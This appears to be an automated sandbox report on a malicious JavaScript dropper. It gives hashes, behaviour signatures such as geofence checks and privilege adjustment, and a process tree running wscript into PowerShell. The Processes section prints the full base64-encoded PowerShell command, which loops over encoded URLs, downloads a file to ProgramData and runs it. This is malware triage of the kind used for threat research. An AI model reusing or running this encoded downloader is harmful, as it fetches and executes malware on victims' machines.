Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
82s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2023, 07:29
Static task
static1
Behavioral task
behavioral1
Sample
dashierDemidoct.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
dashierDemidoct.js
Resource
win10v2004-20230220-en
General
-
Target
dashierDemidoct.js
-
Size
298KB
-
MD5
b76c3c76361cce4cb135a2772c366553
-
SHA1
dfa0ea2e368679ccfa1f4da2655c815bf6ef3749
-
SHA256
0489b7671cbd423e7efd84bedded72481d8314cce7d639a70f8f0afdcb44ae42
-
SHA512
631dc8bf3dd609743693a2f0ec290b76653a9e7d5d72eb4813b275d3959f92cb784fe63f5dec46b716ca7ee5b48550c2199b66b1afa112c7f6b79ff2713ffb29
-
SSDEEP
3072:vsa5dsTMUpjWHj2giYSjuDoIGZCypLEEVYqw6uSeyPzQAUNT:vxdmpo2gisDoP08EL6HeyPzQAS
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 24 3512 powershell.exe 42 3512 powershell.exe 50 3512 powershell.exe 51 3512 powershell.exe 52 3512 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3512 powershell.exe 3512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3512 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3960 wrote to memory of 2528 3960 wscript.exe 87 PID 3960 wrote to memory of 2528 3960 wscript.exe 87 PID 2528 wrote to memory of 3512 2528 wscript.exe 88 PID 2528 wrote to memory of 3512 2528 wscript.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\dashierDemidoct.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\contamMidstout.js" SnaggleteethUngravely Disintoxicate thiazideCedarbird Troland2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABjAGUAcgBhAHUAbgBvAHMAYwBvAHAAZQBQAGEAcgBpAGUAdABvAGYAcgBvAG4AdABhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHkAQQBDADQAQQBNAFEAQQB6AEEARABrAEEAIgA7ACQAdAByAGEAbgBzAGYAbwByAG0AaQBuAGcAbAB5AEYAbwBzAHQAZQByAGEAYgBsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBOAEEAQQA1AEEAQQA9AD0APQByAHUAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWQBRAEIAdQBBAEgAUQBBAGEAQQBCAHAAQQBHADQAQQBaAFEAQgBYAEEARwA4AEEAYwBnAEIAawBBAEgAQQBBAFoAUQBCAHkAQQBHAFkAQQBaAFEAQgBqAEEASABRAEEATABnAEIAcwBBAEcAawBBAD0AcgB1AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAxAEEARwA0AEEAYgB3AEIAeQBBAEcAYwBBAFkAUQBCAHUAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEMANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABBAG0AYQB6AG8AbgBzAHQAbwBuAGUAUABpAGEAbgBlAHQAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE8AQQBBADAAQQBDADQAQQBNAFEAQQA0AEEARABJAEEATABnAEEAeQBBAEQAVQBBAE0AUQBBAD0AZQBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAFoAUQBCAHcAQQBIAFEAQQBiAHcAQgB6AEEASABRAEEAYwBnAEIAaABBAEcATQBBAGIAdwBCADEAQQBIAE0AQQBVAHcAQgAxAEEARwBJAEEAWQBRAEIAeABBAEgAVQBBAFoAUQBCAGgAQQBHADQAQQBMAGcAQgBuAEEASABJAEEAYgB3AEIAMQBBAEgAQQBBAGUAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQAUQBBAE4AQQBBAHUAQQBEAFUAQQBPAEEAQQA9ACIAOwAkAFMAYwBhAGIAcgBvAHUAcwBuAGUAcwBzAFcAYQBzAGgAaQBuAGcAdABvAG4AaQBhAG4AYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AUQBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAFEAQQB2AEEARwBjAEEAWQBRAEIAMwBBAEMAOABBAFoAdwBCAE8AQQBGAE0AQQBkAFEAQQA9AFAAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABVAEEATgBRAEEAdQBBAEQAYwBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQAwAEEAQwA4AEEAUwBnAEIAUABBAEMAOABBAFQAdwBCAEMAQQBBAD0APQBQAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAxAEEAQwA0AEEATQBnAEEAMQBBAEQAQQBBAEwAdwBBADEAQQBFAFkAQQBiAGcAQgBaAEEAQwA4AEEATQBRAEIATgBBAEQATQBBAFQAdwBBAD0AUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBIAGsAQQBkAFEAQgBaAEEARQBRAEEAYgBBAEIATABBAEcASQBBAFMAQQBCAHEAQQBEAEkAQQBRAHcAQgA1AEEAQQA9AD0AUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCADIAQQBHAGMAQQBWAEEAQgAyAEEARQBrAEEAUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAEkAQQBjAFEAQgBpAEEASABRAEEAUgBBAEIASABBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGIAaQBiAGwAaQBvAGsAbABlAHAAdABvAG0AYQBuAGkAYQBjACAAaQBuACAAJABTAGMAYQBiAHIAbwB1AHMAbgBlAHMAcwBXAGEAcwBoAGkAbgBnAHQAbwBuAGkAYQBuAGEAIAAtAHMAcABsAGkAdAAgACIAUABuACIAKQAgAHsAdAByAHkAIAB7ACQASQBtAGIAYQBsAG0AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADgAQQBkAFEAQgAwAEEARwBnAEEAZABRAEIAdABBAEcAOABBAGMAZwBCAHoAQQBDADQAQQBkAHcAQgB6AEEAQQA9AD0AcgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AHIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB3AEEAQwA0AEEATQBRAEEAegBBAEQAQQBBAEwAZwBBADIAQQBEAEEAQQBMAGcAQQB4AEEARABVAEEATgBnAEEAPQByAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEASABJAEEAWQB3AEIAbwBBAEcAWQBBAGEAUQBCAGwAQQBHADQAQQBaAEEAQgBJAEEARwA4AEEAYgBBAEIAdgBBAEcAMABBAFkAUQBCAHoAQQBIAFEAQQBhAFEAQgBuAEEARwA4AEEAZABBAEIAbABBAEMANABBAFoAZwBCAHMAQQBHADgAQQBjAGcAQgBwAEEASABNAEEAZABBAEEAPQAiADsAJABVAG4AZwBlAG4AaQBhAGwAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgB6AEEASABBAEEAZABRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAZABnAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEMANABBAGIAZwBCADEAQQBBAD0APQBFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE0AUQBBADIAQQBEAFkAQQAiADsAJABSAGUAYwBvAHAAeQBpAG4AZwBSAG8AYQBkAHMAdABlAHIAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGkAYgBsAGkAbwBrAGwAZQBwAHQAbwBtAGEAbgBpAGEAYwApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFIAZQBjAG8AcAB5AGkAbgBnAFIAbwBhAGQAcwB0AGUAcgBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBkAGUAcgB1AHMAZQBkAFQAbwByAG4AYQByAGkAYQBuAC4ASQBuAGMAbwBuAHQAcgBvAGwAbABhAGIAbABlADsAJABjAHkAYwBsAG8AbgBvAGwAbwBnAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAegBBAEQATQBBACIAOwAkAEIAZQBzAHQAYQBuAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAFkAQQBhAFEAQgBqAEEASABRAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAHkAQQBHADgAQQBaAEEAQgBsAEEARwA4AEEASwBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBnAEEAdQBBAEQAWQBBAE4AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBkAGUAcgB1AHMAZQBkAFQAbwByAG4AYQByAGkAYQBuAC4ASQBuAGMAbwBuAHQAcgBvAGwAbABhAGIAbABlACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAxADkANQAwADgAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAMQBBAEgATQBBAFoAUQBCAGsAQQBGAFEAQQBiAHcAQgB5AEEARwA0AEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBTAFEAQgB1AEEARwBNAEEAYgB3AEIAdQBBAEgAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBoAEEARwBJAEEAYgBBAEIAbABBAEMAdwBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQQA3AEEAQQA9AD0AIgA7ACQAYwBlAHIAYQB0AG8AbQBhAG4AZABpAGIAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcAVQBBAGMAQQBCAGwAQQBIAFEAQQBhAFEAQgAwAEEARwBrAEEAYgB3AEIAMQBBAEgATQBBAEwAZwBCADQAQQBIAGcAQQBlAEEAQQA9AE8AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGsAQQBHAFUAQQBjAEEAQgBzAEEARwA4AEEAZQBRAEIATQBBAEcARQBBAFoAQQBCADUAQQBHAEkAQQBhAFEAQgB5AEEARwBRAEEATABnAEIAegBBAEcAOABBAGUAUQBBAD0ATwBxAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQA9AE8AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBkAFEAQgBpAEEARwBJAEEAWQBRAEIAcwBBAEUAOABBAFkAZwBCADIAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFkAdwBCAHYAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
298KB
MD5b76c3c76361cce4cb135a2772c366553
SHA1dfa0ea2e368679ccfa1f4da2655c815bf6ef3749
SHA2560489b7671cbd423e7efd84bedded72481d8314cce7d639a70f8f0afdcb44ae42
SHA512631dc8bf3dd609743693a2f0ec290b76653a9e7d5d72eb4813b275d3959f92cb784fe63f5dec46b716ca7ee5b48550c2199b66b1afa112c7f6b79ff2713ffb29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82